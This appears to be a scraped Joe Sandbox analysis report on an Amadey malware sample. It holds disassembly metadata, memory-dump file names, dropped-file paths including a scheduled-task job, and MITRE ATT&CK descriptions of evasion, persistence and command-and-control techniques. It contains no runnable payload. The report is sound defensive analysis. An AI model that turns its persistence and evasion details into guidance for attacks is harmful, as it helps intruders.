Associated: 00000005.00000002.3451017318.000000000028B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.0000000000418000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.00000000004E8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.0000000000517000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000051E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000052D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453445002.000000000052E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453586085.00000000006C3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453609962.00000000006C4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453634749.00000000006C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453658601.00000000006C6000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_220000_axplong.jbxd

Yara matches

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID:
API String ID: 531285432-0
Opcode ID: 463e9cd024a9a041649b3fc19b852fa2a9a8639fa1b277c9fa1bc964e7a7f596
Instruction ID: 89a64d4aa552f06ebff974c441e36436b52901475f1327827e9b42f0bcb51173
Opcode Fuzzy Hash: 463e9cd024a9a041649b3fc19b852fa2a9a8639fa1b277c9fa1bc964e7a7f596
Instruction Fuzzy Hash: 25217FB2E112099FDF01EFA4DC859AEBBB8EF08714F100026FA01B7251DB30AD118FA1

Function 00237040 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 236COMMON

Download Yara Rule

APIs

__Mtx_init_in_situ.LIBCPMT ref: 0023726C

Strings

`z#, xrefs: 00237282
@.", xrefs: 00237250

Memory Dump Source

Source File: 00000005.00000002.3450902029.0000000000221000.00000040.00000001.01000000.00000007.sdmp, Offset: 00220000, based on PE: true

Associated: 00000005.00000002.3450871073.0000000000220000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3450902029.0000000000282000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3450991567.0000000000289000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000028B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.0000000000418000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.00000000004E8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.0000000000517000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000051E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000052D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453445002.000000000052E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453586085.00000000006C3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453609962.00000000006C4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453634749.00000000006C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453658601.00000000006C6000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_220000_axplong.jbxd

Yara matches

Similarity

API ID: Mtx_init_in_situ
String ID: @."$`z#
API String ID: 3366076730-1341170018
Opcode ID: 98745617a1373c37cb361cdb6ef87c20de5d7b83f2fb18b49407e47c99181d58
Instruction ID: d2543cd71dfccf38c9f44d3429b550f7cd083620c67c91a4a04aaf001132a40e
Opcode Fuzzy Hash: 98745617a1373c37cb361cdb6ef87c20de5d7b83f2fb18b49407e47c99181d58
Instruction Fuzzy Hash: 78A127B1E11615CFDB21CFA8C98479EBBF0AF48710F14815AE85AAB351D7759D01CF80

Function 0025F21F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0025F263

Strings

`'(, xrefs: 0025F235
8"(, xrefs: 0025F30B

Memory Dump Source

Source File: 00000005.00000002.3450902029.0000000000221000.00000040.00000001.01000000.00000007.sdmp, Offset: 00220000, based on PE: true

Associated: 00000005.00000002.3450871073.0000000000220000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3450902029.0000000000282000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3450991567.0000000000289000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000028B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.0000000000418000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.00000000004E8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.0000000000517000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000051E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000052D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453445002.000000000052E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453586085.00000000006C3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453609962.00000000006C4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453634749.00000000006C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453658601.00000000006C6000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_220000_axplong.jbxd

Yara matches

Similarity

API ID: ___free_lconv_mon
String ID: 8"($`'(
API String ID: 3903695350-901913957
Opcode ID: 163fb4566d27a3718d02fd2bf6a86352a06686bcfe4593981d981ddebc8b9e77
Instruction ID: 32cdedc480df7d6f3633604ed658283d61d26280de953acd669b57cc6611dfe8
Opcode Fuzzy Hash: 163fb4566d27a3718d02fd2bf6a86352a06686bcfe4593981d981ddebc8b9e77
Instruction Fuzzy Hash: EB318F7152030AAFEB60AF39DA06B5673E8AF00313F50456AEC4AD7191DF71EC688B19

Function 00223930 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

__Mtx_init_in_situ.LIBCPMT ref: 00223962
__Mtx_init_in_situ.LIBCPMT ref: 002239A1

Strings

pB", xrefs: 00223940

Memory Dump Source

Source File: 00000005.00000002.3450902029.0000000000221000.00000040.00000001.01000000.00000007.sdmp, Offset: 00220000, based on PE: true

Associated: 00000005.00000002.3450871073.0000000000220000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3450902029.0000000000282000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3450991567.0000000000289000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000028B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.0000000000418000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.00000000004E8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.0000000000517000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000051E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000052D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453445002.000000000052E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453586085.00000000006C3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453609962.00000000006C4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453634749.00000000006C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453658601.00000000006C6000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_220000_axplong.jbxd

Yara matches

Similarity

API ID: Mtx_init_in_situ
String ID: pB"
API String ID: 3366076730-3164593441
Opcode ID: 04ab061a81a37bd5d04d0cc61b18da6ca2fc7647d29226caef7d605704573531
Instruction ID: 4543e72c6692b322dce84055172510cc254b48fcf15093ed585bd7a69a145750
Opcode Fuzzy Hash: 04ab061a81a37bd5d04d0cc61b18da6ca2fc7647d29226caef7d605704573531
Instruction Fuzzy Hash: 664135B0501B069FD720CF59C588B5ABBF0FF44315F108619E96A8B341EBB9EA65CF80

Function 00222520 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00222552

Strings

P#", xrefs: 00222547
P#", xrefs: 0022255D

Memory Dump Source

Source File: 00000005.00000002.3450902029.0000000000221000.00000040.00000001.01000000.00000007.sdmp, Offset: 00220000, based on PE: true

Associated: 00000005.00000002.3450871073.0000000000220000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3450902029.0000000000282000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3450991567.0000000000289000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000028B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.0000000000418000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.00000000004E8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.0000000000517000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000051E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000052D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453445002.000000000052E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453586085.00000000006C3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453609962.00000000006C4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453634749.00000000006C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453658601.00000000006C6000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_220000_axplong.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: P#"$P#"
API String ID: 2659868963-2896502121
Opcode ID: e4d21caa2489085ddeb4889c84a56f4adc607687f116906742a5673dc91d5f78
Instruction ID: 2a27a12427a4fcccb93fd8d286609564796d82b080ac963ec5d0f5305c47fc05
Opcode Fuzzy Hash: e4d21caa2489085ddeb4889c84a56f4adc607687f116906742a5673dc91d5f78
Instruction Fuzzy Hash: 55F08275D2120DDBC714DF68D84198EBBF8AF59300F1082AEE844A7240EA715A688F99

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Amadey

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe:Zone.Identifier

C:\Windows\Tasks\axplong.job

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Suricata IDS Alerts

Network Port Distribution

Windows Analysis Report
file.exe

Function 0022BD60 Relevance: 19.6, APIs: 4, Strings: 7, Instructions: 310
networkfileCOMMON

Function 002265B0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 257
COMMON

Function 00225DF0 Relevance: 12.6, APIs: 2, Strings: 5, Instructions: 364
COMMON

Function 00227D00 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 392
COMMON

Function 00256E01 Relevance: 4.6, APIs: 3, Instructions: 145
COMMON

Function 0025D4F4 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 198
COMMONLIBRARYCODE

Function 002282B0 Relevance: 1.7, APIs: 1, Instructions: 159
COMMON

Function 00256C99 Relevance: 1.6, APIs: 1, Instructions: 89
COMMON

Function 00256F71 Relevance: 1.6, APIs: 1, Instructions: 56
timeCOMMON

Function 0025D6EF Relevance: 1.5, APIs: 1, Instructions: 40
memoryCOMMON

Function 00236AE0 Relevance: 1.3, APIs: 1, Instructions: 40
sleepCOMMON